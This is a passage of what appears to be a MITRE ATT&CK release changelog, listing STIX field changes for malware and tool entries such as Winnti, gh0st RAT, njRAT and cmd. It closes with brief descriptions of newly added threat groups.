| external_references[3]['source_name'] | Novetta Winnti April 2015 | 401 TRG Winnti Umbrella May 2018 |
| external_references[3]['description'] | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. | Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018. |
| external_references[3]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | https://401trg.github.io/pages/burning-umbrella.html |
| external_references[4]['source_name'] | Chronicle Winnti for Linux May 2019 | Kaspersky Winnti April 2013 |
| external_references[4]['description'] | Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020. | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. |
| external_references[4]['url'] | https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a | https://securelist.com/winnti-more-than-just-a-game/37029/ |
| x_mitre_version | 2.0 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Novetta Winnti April 2015', 'description': 'Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.', 'url': 'http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf'} |
| Description |
|---|
| [XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 00:43:30.036000+00:00 | 2022-10-18 20:40:59.749000+00:00 |
| external_references[1]['source_name'] | XCSSET | OSX.DubRobber |
| external_references[1]['description'] | (Citation: trendmicro xcsset xcode project 2020) | (Citation: malwarebyteslabs xcsset dubrobber) |
| external_references[2]['source_name'] | OSX.DubRobber | XCSSET |
| external_references[2]['description'] | (Citation: malwarebyteslabs xcsset dubrobber) | (Citation: trendmicro xcsset xcode project 2020) |
| x_mitre_version | 1.0 | 1.2 |
| Old Description | New Description |
|---|---|
| [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm) | [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:44:21.378000+00:00 | 2022-09-30 20:52:00.462000+00:00 |
| description | [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm) | [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) | [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:32:58.702000+00:00 | 2022-04-15 15:01:42.835000+00:00 |
| description | [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) | [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) |
| external_references[1]['description'] | (Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) | (Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) |
| external_references[2]['description'] | (Citation: Talos ZxShell Oct 2014 ) | (Citation: Talos ZxShell Oct 2014) |
| external_references[3]['source_name'] | FireEye APT41 Aug 2019 | Talos ZxShell Oct 2014 |
| external_references[3]['description'] | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. | Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019. |
| external_references[3]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://blogs.cisco.com/security/talos/opening-zxshell |
| external_references[4]['source_name'] | Talos ZxShell Oct 2014 | FireEye APT41 Aug 2019 |
| external_references[4]['description'] | Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019. | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. |
| external_references[4]['url'] | https://blogs.cisco.com/security/talos/opening-zxshell | https://content.fireeye.com/apt-41/rpt-apt41 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At) | [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:34:22.227000+00:00 | 2022-09-22 20:56:56.049000+00:00 |
| description | [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At) | [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at) |
| external_references[1]['source_name'] | TechNet At | Linux at |
| external_references[1]['description'] | Microsoft. (n.d.). At. Retrieved April 28, 2016. | IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/library/bb490866.aspx | https://man7.org/linux/man-pages/man1/at.1p.html |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet At', 'description': 'Microsoft. (n.d.). At. Retrieved April 28, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/bb490866.aspx'} |
| Description |
|---|
| [cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd) Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir (Citation: TechNet Dir)), deleting files (e.g., del (Citation: TechNet Del)), and copying files (e.g., copy (Citation: TechNet Copy)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:38:23.242000+00:00 | 2022-10-13 20:24:11.194000+00:00 |
| external_references[2]['source_name'] | TechNet Dir | TechNet Copy |
| external_references[2]['description'] | Microsoft. (n.d.). Dir. Retrieved April 18, 2016. | Microsoft. (n.d.). Copy. Retrieved April 26, 2016. |
| external_references[2]['url'] | https://technet.microsoft.com/en-us/library/cc755121.aspx | https://technet.microsoft.com/en-us/library/bb490886.aspx |
| external_references[4]['source_name'] | TechNet Copy | TechNet Dir |
| external_references[4]['description'] | Microsoft. (n.d.). Copy. Retrieved April 26, 2016. | Microsoft. (n.d.). Dir. Retrieved April 18, 2016. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/bb490886.aspx | https://technet.microsoft.com/en-us/library/cc755121.aspx |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-18 20:01:55.739000+00:00 | 2022-10-13 13:34:53.355000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP) | [ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:25:40.125000+00:00 | 2022-03-07 22:20:18.809000+00:00 |
| name | FTP | ftp |
| description | [FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP) | [ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP) |
| external_references[1]['source_name'] | Wikipedia FTP | Microsoft FTP |
| external_references[1]['description'] | Wikipedia. (2016, June 15). File Transfer Protocol. Retrieved July 20, 2016. | Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/File_Transfer_Protocol | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp |
| x_mitre_aliases[0] | FTP | ftp |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Linux FTP', 'description': 'N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022.', 'url': 'https://linux.die.net/man/1/ftp'} |
| Old Description | New Description |
|---|---|
| [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) | [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html | |
| external_references | https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-23 20:43:13.190000+00:00 | 2022-09-30 21:03:21.873000+00:00 |
| description | [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) | [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) |
| external_references[2]['source_name'] | FireEye Hacking Team | Mydoor |
| external_references[2]['description'] | FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016. | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | Arbor Musical Chairs Feb 2018 | Moudoor |
| external_references[3]['description'] | Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018. | (Citation: Novetta-Axiom) |
| external_references[4]['source_name'] | Nccgroup Gh0st April 2018 | FireEye Hacking Team |
| external_references[4]['description'] | Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018. | FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016. |
| external_references[4]['url'] | https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/ | https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html |
| x_mitre_version | 2.3 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'} | |
| external_references | {'source_name': 'Nccgroup Gh0st April 2018', 'description': 'Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.', 'url': 'https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/'} | |
| external_references | {'source_name': 'Arbor Musical Chairs Feb 2018', 'description': 'Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.', 'url': 'https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/'} | |
| x_mitre_aliases | Mydoor | |
| x_mitre_aliases | Moudoor |
| Description |
|---|
| [gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:35:48.851000+00:00 | 2022-09-22 20:55:32.937000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:28:49.335000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ipconfig.exe |
| Description |
|---|
| [netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows', 'Linux', 'macOS'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:29:16.407000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | netstat.exe |
| Description |
|---|
| [njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-14 22:25:02.713000+00:00 | 2022-09-16 19:33:56.130000+00:00 |
| external_references[1]['source_name'] | Njw0rm | LV |
| external_references[1]['description'] | Some sources have discussed Njw0rm as a later variant of njRAT, where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of njRAT itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) | (Citation: Fidelis njRAT June 2013) |
| external_references[2]['source_name'] | LV | Bladabindi |
| external_references[2]['description'] | (Citation: Fidelis njRAT June 2013) | (Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) |
| external_references[3]['source_name'] | Bladabindi | FireEye Njw0rm Aug 2013 |
| external_references[3]['description'] | (Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019. |
| external_references[5]['source_name'] | FireEye Njw0rm Aug 2013 | Trend Micro njRAT 2018 |
| external_references[5]['description'] | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019. | Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html | https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/ |
| external_references[6]['source_name'] | Trend Micro njRAT 2018 | Njw0rm |
| external_references[6]['description'] | Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. | Some sources have discussed Njw0rm as a later variant of [njRAT](https://attack.mitre.org/software/S0385), where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of [njRAT](https://attack.mitre.org/software/S0385) itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) |
| x_mitre_version | 1.2 | 1.4 |
| Description |
|---|
| [route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ['route', 'route.exe'] | |
| x_mitre_platforms | ['Linux', 'Windows', 'macOS'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-04-06 15:27:00.668000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-31 12:42:36.620000+00:00 | 2022-04-20 20:04:22.896000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon) | [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-16 15:50:05.015000+00:00 | 2022-09-22 00:38:34.857000+00:00 |
| description | [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon) | [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon) |
| x_mitre_version | 1.1 | 2.0 |
| Description |
|---|
| [Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022) |
| Description |
|---|
| [Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021) |
| Description |
|---|
| [BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) |
| Description |
|---|
| [Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021) |
| Description |
|---|
| [EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022) |
| Description |
|---|
| [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) |
| Description |
|---|
| [Ember Bear](https://attack.mitre.org/groups/G1003) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://attack.mitre.org/groups/G1003) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://attack.mitre.org/groups/G1003) likely conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) |
| Description |
|---|
| [Gelsemium](https://attack.mitre.org/groups/G0141) is a cyberespionage group that has been active since at least 2014, targeting governmental institutions, electronics manufacturers, universities, and religious organizations in East Asia and the Middle East.(Citation: ESET Gelsemium June 2021) |
| Description |
|---|
| [HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021) |
| Description |
|---|
| [LAPSUS$](https://attack.mitre.org/groups/G1004) is a cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022) |
| Description |
|---|
